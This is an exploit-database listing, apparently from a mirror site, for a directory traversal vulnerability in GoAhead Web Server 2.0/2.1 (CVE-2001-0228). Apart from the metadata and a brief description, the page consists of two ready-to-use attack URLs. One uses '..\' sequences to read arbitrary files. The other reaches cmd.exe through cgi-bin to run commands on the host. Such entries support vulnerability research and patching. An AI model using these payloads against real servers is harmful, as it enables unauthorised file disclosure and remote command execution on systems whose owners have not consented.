[] NeoSense
E X P L O I T S
title author type platform port cve id

GoAhead Web Server 2.0/2.1 - Directory Traversal

Author: Sergey Nenashev
type: remote
platform: windows
port: 
date_added: 2001-02-02 
date_updated: 2012-08-18 
verified: 1 
codes: CVE-2001-0228;OSVDB-3694 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/2334/info

A specially crafted URL composed of '..\' sequences along with the known filename will disclose the requested file. This vulnerability will also allow an attacker to execute arbitrary code with root privileges.

Gaining access to a known file:

http://target/..\..\..\..\..\..\filename

Executing arbitrary commands:

http://target/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.